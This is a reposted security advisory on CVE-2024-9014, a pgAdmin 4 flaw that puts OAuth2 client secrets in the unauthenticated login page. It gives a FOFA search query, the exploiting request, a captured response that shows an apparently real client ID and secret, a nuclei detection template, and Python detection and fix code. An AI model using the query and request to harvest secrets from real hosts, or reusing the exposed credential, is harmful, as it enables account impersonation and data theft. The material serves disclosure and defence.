CVE-2024-9014

admin · 2024-10-07 23:22:27 · 45 views · 3872 characters · about 13 minutes to read


01

Vulnerability Name

pgAdmin 4 OAuth2 client ID and client secret sensitive-information disclosure

02

Affected Versions

pgAdmin4 8.9-3.fc40

pgAdmin4 8.12-1.fc41

(Fedora package versions as listed in the original. Upstream, pgAdmin 4 8.11 and earlier are affected and the fix shipped in 8.12, so an 8.12 package is the patched build, not a vulnerable one; the nuclei template below states the same range.)


03

Vulnerability Description

pgAdmin 4 is the graphical administration tool for the open-source PostgreSQL database. In 2024, CVE-2024-9014, an OAuth2 client ID and client secret disclosure vulnerability in pgAdmin 4, was published. When OAuth2 authentication is enabled, the login page, which is reachable without authentication, embeds the complete OAuth2 provider configuration, including OAUTH2_CLIENT_ID and OAUTH2_CLIENT_SECRET, in the page's JavaScript, so an attacker who simply requests the login page obtains the client ID and secret. The client secret is the credential a confidential OAuth2 client presents to the identity provider's token endpoint, so whoever holds it can impersonate the pgAdmin application toward the provider, which can lead to unauthorized access to other users' data. The vendor has released a security update; upgrading to the latest version is recommended.

04

FOFA search query
icon_hash="1502815117"


05

Reproduction

Send the following request to the target (an unauthenticated GET of the login page):

GET /login?next=/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11) AppleWebKit/601.1.27 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/601.1.27
Connection: close
Accept-Encoding: gzip

The response is as follows:

HTTP/1.1 200 OK
Connection: close
Content-Security-Policy: default-src ws: http: data: blob: 'unsafe-inline' 'unsafe-eval';
Content-Type: text/html; charset=utf-8
Date: Mon, 07 Oct 2024 09:28:35 GMT
Server: gunicorn
Set-Cookie: pga4_session=363dd09a-fee5-403e-8e8f-d55680b3f182!eZ4oYiB5uSYYlK/N7KtvaLk4R1o5eKkz48mHvSualtk=; Expires=Tue, 08 Oct 2024 09:28:35 GMT; HttpOnly; Path=/; SameSite=Lax
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-Xss-Protection: 1; mode=block

<!DOCTYPE html>
...
<script type="application/javascript">
    try {
        require(
            ['security.pages'],
            function() {
                window.renderSecurityPage('login_user', {
                    "authSources": ["oauth2", "internal"],
                    "authSourcesEnum": {"KERBEROS": "kerberos", "OAUTH2": "oauth2"},
                    "csrfToken": "ImY1NzA1ZmZkMWYzNDAyYzg1ZmU2ZGE5OTE3NDhhOTU1ZTBiOWM2Yzki.ZwOpww.lo_Rs3jMAy_gm5G4_Z6c-q7ISdc",
                    "forgotPassUrl": "/browser/reset_password",
                    "langOptions": [{"label": "English", "value": "en"}, {"label": "Chinese (Simplified)", "value": "zh"}, {"label": "Czech", "value": "cs"}, {"label": "French", "value": "fr"}, {"label": "German", "value": "de"}, {"label": "Indonesian", "value": "id"}, {"label": "Italian", "value": "it"}, {"label": "Japanese", "value": "ja"}, {"label": "Korean", "value": "ko"}, {"label": "Polish", "value": "pl"}, {"label": "Portuguese (Brazilian)", "value": "pt_BR"}, {"label": "Russian", "value": "ru"}, {"label": "Spanish", "value": "es"}],
                    "loginBanner": "",
                    "loginUrl": "/authenticate/login",
                    "oauth2Config": [{
                        "OAUTH2_API_BASE_URL": "https://graph.microsoft.com/oidc/userinfo",
                        "OAUTH2_AUTHORIZATION_URL": "https://login.microsoftonline.com/81464583-3a2a-4b1b-9b3e-886fa00de22b/oauth2/v2.0/authorize",
                        "OAUTH2_BUTTON_COLOR": "#0000ff",
                        "OAUTH2_CLIENT_ID": "91a5b302-7076-4ab8-ae36-8ce782204f2f",
                        "OAUTH2_CLIENT_SECRET": "5uE8Q~3RDpIEk2LfpFttHtBFtdfDMXF-aAKcDa5h",
                        "OAUTH2_DISPLAY_NAME": "Microsoft",
                        "OAUTH2_ICON": "fa-microsoft",
                        "OAUTH2_NAME": "microsoft",
                        "OAUTH2_SCOPE": "openid email",
                        "OAUTH2_SERVER_METADATA_URL": "https://login.microsoftonline.com/81464583-3a2a-4b1b-9b3e-886fa00de22b/v2.0/.well-known/openid-configuration",
                        "OAUTH2_TOKEN_URL": "https://login.microsoftonline.com/81464583-3a2a-4b1b-9b3e-886fa00de22b/oauth2/v2.0/token",
                        "OAUTH2_USERINFO_ENDPOINT": "userinfo"
                    }],
                    "userLanguage": "en"
                },
                {"messages": []});
            }, function() {
                console.log(arguments);

The oauth2Config object in the response body carries OAUTH2_CLIENT_ID and, critically, OAUTH2_CLIENT_SECRET in clear text, returned to a client that has not authenticated at all; reproduction complete. On a patched build the secret field is null, which is exactly the condition the nuclei template below keys on.

06

nuclei PoC

The PoC file (the community nuclei template by s4e-io; its name says "Authentication Bypass", but the matchers only detect the exposed secret) reads as follows:

id: CVE-2024-9014

info:
  name: pgAdmin 4 - Authentication Bypass
  author: s4e-io
  severity: critical
  description: |
    pgAdmin 4 versions 8.11 and earlier are vulnerable to a security flaw in OAuth2 authentication. This vulnerability allows an attacker to potentially obtain the client ID and secret, leading to unauthorized access to user data.
  reference:
    - https://github.com/EQSTLab/CVE-2024-9014
    - https://github.com/pgadmin-org/pgadmin4/issues/7945
    - https://nvd.nist.gov/vuln/detail/CVE-2024-9014
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 9.9
    cve-id: CVE-2024-9014
    cwe-id: CWE-522
    epss-score: 0.00043
    epss-percentile: 0.09595
  metadata:
    verified: true
    max-request: 1
    vendor: pgadmin-org
    product: pgadmin4
    fofa-query: "pgadmin4"
  tags: cve,cve2024,pgadmin,exposure,auth-bypass

http:
  - raw:
      - |
        GET /login?next=/ HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        negative: true
        regex:
          - 'OAUTH2_CLIENT_SECRET": null'

      - type: word
        part: body
        words:
          - '<title>pgAdmin 4</title>'
          - 'OAUTH2_CLIENT_SECRET'
        condition: and

      - type: status
        status:
          - 200
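The same check as a script, as an added example (not code from the original post, from pgAdmin, or from the nuclei template's author): it parses the object that the login page hands to window.renderSecurityPage('login_user', ...), the structure visible in the captured response in the reproduction section, and reports every OAuth2 provider whose OAUTH2_CLIENT_SECRET is present and non-null, which is the condition the template's negative regex on 'OAUTH2_CLIENT_SECRET": null' expresses. Unlike a regex, the brace-matching extraction survives secrets that contain quotes or braces and gives you the client ID and token URL for the incident report. The two HTML bodies, the client ID and the secret in them are constructed for the example, so it runs offline; point `leaked_oauth2_clients` at a body fetched with any HTTP client to use it against a real host.

```python
"""Detect CVE-2024-9014 in a pgAdmin 4 login page body.

Added example, not code from the original post or from pgAdmin itself. It
extracts the configuration object that the login page passes to
window.renderSecurityPage('login_user', {...}, {...}) and reports every
OAuth2 provider whose OAUTH2_CLIENT_SECRET is present and non-null (patched
builds send null). The sample bodies below are constructed, not captures.
"""
import json
from typing import List, Optional

_MARKER = "window.renderSecurityPage('login_user',"


def extract_login_config(html: str) -> Optional[dict]:
    """Return the first argument of renderSecurityPage as a dict, or None."""
    start = html.find(_MARKER)
    if start == -1:
        return None
    pos = html.find("{", start + len(_MARKER))
    if pos == -1:
        return None
    # Brace-match the object literal, skipping over JSON string contents so
    # that braces or quotes inside values (e.g. a secret) do not end the scan.
    depth, in_str, escaped = 0, False, False
    for i in range(pos, len(html)):
        ch = html[i]
        if in_str:
            if escaped:
                escaped = False
            elif ch == "\\":
                escaped = True
            elif ch == '"':
                in_str = False
        elif ch == '"':
            in_str = True
        elif ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:
                try:
                    return json.loads(html[pos:i + 1])
                except json.JSONDecodeError:
                    return None
    return None


def leaked_oauth2_clients(html: str) -> List[dict]:
    """One record per provider whose client secret reached the browser."""
    config = extract_login_config(html)
    if not config:
        return []
    findings = []
    for provider in config.get("oauth2Config") or []:
        secret = provider.get("OAUTH2_CLIENT_SECRET")
        if secret:  # None, missing or "" means this build is not leaking it
            findings.append({
                "provider": provider.get("OAUTH2_NAME"),
                "client_id": provider.get("OAUTH2_CLIENT_ID"),
                "token_url": provider.get("OAUTH2_TOKEN_URL"),
                # Report a prefix only; never write the full secret to a log.
                "secret_prefix": secret[:4] + "...",
            })
    return findings


def is_vulnerable(html: str) -> bool:
    return bool(leaked_oauth2_clients(html))


# Constructed sample bodies: placeholder client ID and a fake secret that
# contains braces, to exercise the string-aware scan.
VULNERABLE_BODY = """<!DOCTYPE html><html><head><title>pgAdmin 4</title></head><body><script>
window.renderSecurityPage('login_user', {"authSources": ["oauth2", "internal"],
 "oauth2Config": [{"OAUTH2_NAME": "microsoft",
  "OAUTH2_CLIENT_ID": "11111111-2222-3333-4444-555555555555",
  "OAUTH2_CLIENT_SECRET": "EXAMPLE~not{a}real-secret",
  "OAUTH2_TOKEN_URL": "https://login.example/oauth2/v2.0/token"}],
 "userLanguage": "en"}, {"messages": []});
</script></body></html>"""

# What a patched build serves: same structure, secret replaced by null.
PATCHED_BODY = VULNERABLE_BODY.replace('"EXAMPLE~not{a}real-secret"', "null")

if __name__ == "__main__":
    for label, body in (("vulnerable build", VULNERABLE_BODY),
                        ("patched build", PATCHED_BODY)):
        print(label, "->", leaked_oauth2_clients(body))
```

Run against a live host by fetching `/login?next=/` without cookies and passing the body to `leaked_oauth2_clients`; an empty list on a page that does contain renderSecurityPage means the build already nulls the secret.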

07

Remediation

Upgrade to pgAdmin 4 8.12 or later, which stops sending OAUTH2_CLIENT_SECRET to the browser. Because the secret was served to anyone who could reach the login page, treat it as compromised: rotate the client secret at the identity provider (for the Microsoft provider in the example above, the Microsoft Entra ID / Azure AD app registration) and review that provider's sign-in and token logs for requests the application did not make. Until the upgrade is in place, restrict network access to the pgAdmin login page.
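The root-cause pattern and its fix, as an added example that is not pgAdmin's own code: the description above boils down to a server serialising its entire OAuth2 provider configuration into an unauthenticated page, when the login button only needs the provider's name, display name, icon and colour. `render_login_config_vulnerable` reproduces that weak pattern; `render_login_config_hardened` projects each provider onto an explicit allow-list of browser-safe fields and then fails closed if any credential-like key is still present anywhere in the payload, so a later refactor cannot quietly reintroduce the leak. The OAUTH2_* keys mirror those in the captured response; the values, `PUBLIC_OAUTH2_FIELDS` and all function names are constructed for this example.

```python
"""Weak versus hardened serialisation of OAuth2 config for a login page.

Added example, not pgAdmin's own code. The OAUTH2_* keys mirror the ones seen
in the CVE-2024-9014 leak; the values are placeholders. The hardened renderer
allow-lists the fields the browser needs and refuses to render if anything
secret-like remains, instead of trusting that the secret was removed.
"""
import json
from typing import Dict, List

# Constructed provider config (placeholder values, not real credentials).
OAUTH2_CONFIG: List[Dict] = [{
    "OAUTH2_NAME": "microsoft",
    "OAUTH2_DISPLAY_NAME": "Microsoft",
    "OAUTH2_ICON": "fa-microsoft",
    "OAUTH2_BUTTON_COLOR": "#0000ff",
    "OAUTH2_CLIENT_ID": "11111111-2222-3333-4444-555555555555",
    "OAUTH2_CLIENT_SECRET": "EXAMPLE~notarealsecret",
    "OAUTH2_AUTHORIZATION_URL": "https://login.example/oauth2/v2.0/authorize",
    "OAUTH2_TOKEN_URL": "https://login.example/oauth2/v2.0/token",
    "OAUTH2_API_BASE_URL": "https://graph.example/oidc/userinfo",
    "OAUTH2_USERINFO_ENDPOINT": "userinfo",
    "OAUTH2_SERVER_METADATA_URL": "https://login.example/v2.0/.well-known/openid-configuration",
    "OAUTH2_SCOPE": "openid email",
}]

# The only fields a "Sign in with <provider>" button needs. The client secret,
# token/userinfo endpoints and scope are used server-side during the code
# exchange and have no business in the page.
PUBLIC_OAUTH2_FIELDS = frozenset({
    "OAUTH2_NAME", "OAUTH2_DISPLAY_NAME", "OAUTH2_ICON", "OAUTH2_BUTTON_COLOR",
})


def render_login_config_vulnerable(providers: List[Dict]) -> str:
    """Weak pattern: the complete server-side config is serialised for the browser."""
    return json.dumps({"authSources": ["oauth2", "internal"],
                       "oauth2Config": providers})


def public_oauth2_view(provider: Dict) -> Dict:
    """Project one provider config onto its browser-safe fields only."""
    return {k: v for k, v in provider.items() if k in PUBLIC_OAUTH2_FIELDS}


def find_secret_keys(node, path: str = "") -> List[str]:
    """Return dotted paths of every key that looks like a credential."""
    found: List[str] = []
    if isinstance(node, dict):
        for k, v in node.items():
            here = f"{path}.{k}" if path else k
            if any(w in k.upper() for w in ("SECRET", "PASSWORD", "PRIVATE_KEY")):
                found.append(here)
            found.extend(find_secret_keys(v, here))
    elif isinstance(node, list):
        for i, item in enumerate(node):
            found.extend(find_secret_keys(item, f"{path}[{i}]"))
    return found


def render_login_config_hardened(providers: List[Dict]) -> str:
    """Fixed pattern: allow-list, then fail closed if a credential slipped through."""
    payload = {"authSources": ["oauth2", "internal"],
               "oauth2Config": [public_oauth2_view(p) for p in providers]}
    leaks = find_secret_keys(payload)
    if leaks:
        raise ValueError(f"refusing to render credentials to the client: {leaks}")
    return json.dumps(payload)


def exposes_secret(rendered_json: str) -> bool:
    """Same condition the detection check uses: a non-null client secret in the page."""
    return any(p.get("OAUTH2_CLIENT_SECRET")
               for p in json.loads(rendered_json).get("oauth2Config", []))


if __name__ == "__main__":
    print("vulnerable renderer leaks secret:",
          exposes_secret(render_login_config_vulnerable(OAUTH2_CONFIG)))
    print("hardened renderer leaks secret:  ",
          exposes_secret(render_login_config_hardened(OAUTH2_CONFIG)))
```

The allow-list is the actual fix; `find_secret_keys` is the guard rail that turns a future mistake into a failed page render rather than a disclosure, which is the behaviour you want from code that decides what an unauthenticated user gets to see.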

Originally published on the WeChat public account AI与网安: CVE-2024-9014

Disclaimer: the programs (methods) described in this article may be offensive in nature and are provided solely for security research and teaching. Readers who use this information for any other purpose bear all legal and joint liability; this site assumes none. For questions, contact us by e-mail (preferably from a corporate or other valid mailbox so the message is not filtered; contact details are on the home page).
Posted by admin on 2024-10-07 23:22:27.
Please keep this link when reposting (CN-SEC中文网; thanks to the original author for their work): CVE-2024-9014 https://cn-sec.com/archives/3238176.html
